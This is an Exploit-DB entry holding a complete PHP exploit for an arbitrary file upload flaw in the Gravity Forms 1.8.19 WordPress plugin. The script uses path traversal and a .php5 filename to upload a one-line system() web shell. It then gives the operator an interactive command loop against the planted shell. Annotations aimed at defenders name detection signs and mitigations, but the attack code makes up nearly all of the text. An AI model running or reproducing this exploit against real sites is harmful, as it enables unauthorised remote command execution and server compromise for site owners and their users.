WordPress Plugin Gravity Forms 1.8.19 – Arbitrary File Upload

  • 作者: Abk Khan
    日期: 2016-06-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39969/
  • <?php
    /****************************************************************************************************************************
     *
    	* Exploit Title: Gravity Forms [WP] - Arbitrary File Upload
    	* Vulnerable Version(s): 1.8.19 (and below)
    	* Write-Up : https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
    	* Coded by : Abk Khan [ an0nguy @ protonmail.ch ]
    *
    *****************************************************************************************************************************/
    // Silences all PHP warnings/notices for the rest of the run (e.g. the undefined
    // $argv index and the undefined $testCom on the first loop iteration below).
    error_reporting(0);
    
    // Banner only; no functional effect.
    echo "
     _____ _ _ _______ _ 
    / ____| (_) | |____|| | |
     | |__ _ __ __ ___ ___| |_ _ _| |__ __ _| | |___ 
     | | |_ | '__/ _` \ \ / / | __| | | |__/ _` | | / __|
     | |__| | | | (_| |\ V /| | |_| |_| | | | (_| | | \__ \
    \_____|_|\__,_| \_/ |_|\__|\__, |_|\__,_|_|_|___/
    __/ |
     |___/ > an Exploiter by AnonGuy\n";
    // Target base URL comes from the first CLI argument; defaults to a local install.
    $domain= (@$argv[1] == '' ? 'http://localhost/wordpress' : @$argv[1]);
    // The vulnerable endpoint: Gravity Forms' own upload handler, reachable via the
    // ?gf_page=upload query parameter without authentication in the affected versions.
    $url = "$domain/?gf_page=upload";
    // Where the script expects the written file to end up. Defenders: an unexpected
    // .php5/.php file directly under wp-content/ (here named _input_3_khan.php5) is
    // the on-disk artefact of a successful run of this exploit.
    $shell = "$domain/wp-content/_input_3_khan.php5";
    $separator = '-------------------------------------------------------------------';
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    // The POST body carries the file content (a one-line PHP web shell that runs
    // $_GET[0] through system()) plus the form fields the handler reads. The two
    // fields that matter for detection are `gform_unique_id=../../../../` (a path
    // traversal that moves the write location out of the intended temp directory)
    // and `name=khan.php5` (a PHP-executable extension; presumably chosen because a
    // naive `.php`-only extension check does not cover `.php5` — see the linked write-up).
    // Detection: a WAF/log rule for POSTs to `?gf_page=upload` whose gform_unique_id
    // contains `..` or whose `name` has a server-side-executable extension.
    // Mitigation: upgrade the plugin past the affected versions noted in the header,
    // and disable PHP execution under wp-content/uploads via web-server configuration.
    curl_setopt($ch, CURLOPT_POSTFIELDS, '<?php system($_GET[0]); ?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    
    // The handler answers with a JSON-ish body containing "ok" on success; that
    // substring is the only success signal this script checks.
    if (strpos($response, '"ok"') !== false) {
    echo "$separator\nShell at $shell\n$separator\nSpawning a 'No-Session' Shell . . . Done!\n$separator\n";
    // $testCom is not assigned before this loop, so the first check compares an
    // undefined variable (warning suppressed above) and the loop always runs once.
    while ($testCom != 'exit') {
    		// Each command is a plain GET to the dropped file with the command in
    		// parameter 0, wrapped in '~' markers so the output can be cut out of
    		// the response. Defenders: repeated GETs to a file under wp-content/ with
    		// `0=echo%20'~'` in the query string are a strong indicator of this loop.
    		$user= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
    		$b0x = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20hostname;%20echo%20'~'"), '~', '~'));
    echo "$user@$b0x:~$ ";
    // Reads one command line from the operator's terminal.
    $handle= fopen("php://stdin", 'r');
    $testCom = trim(fgets($handle));
    fclose($handle);
    $comOut= trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
    echo $comOut;
    }
    }
    else {
    	die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
    }
    
    // Returns the text between the first occurrence of $start and the next
    // occurrence of $end after it; '' when $start is not found.
    // Quirks kept from the original: the haystack is space-prefixed, so a match
    // at index 0 is reported as "not found"; and when $end is absent strpos()
    // yields false, which the arithmetic treats as 0, producing a negative length.
    function get_string_between($string, $start, $end)
    {
        $haystack = ' ' . $string;
        $from = strpos($haystack, $start);
        if ($from === false || $from === 0) {
            return '';
        }
        $from += strlen($start);
        $to = strpos($haystack, $end, $from);
        return substr($haystack, $from, $to - $from);
    }
    ?>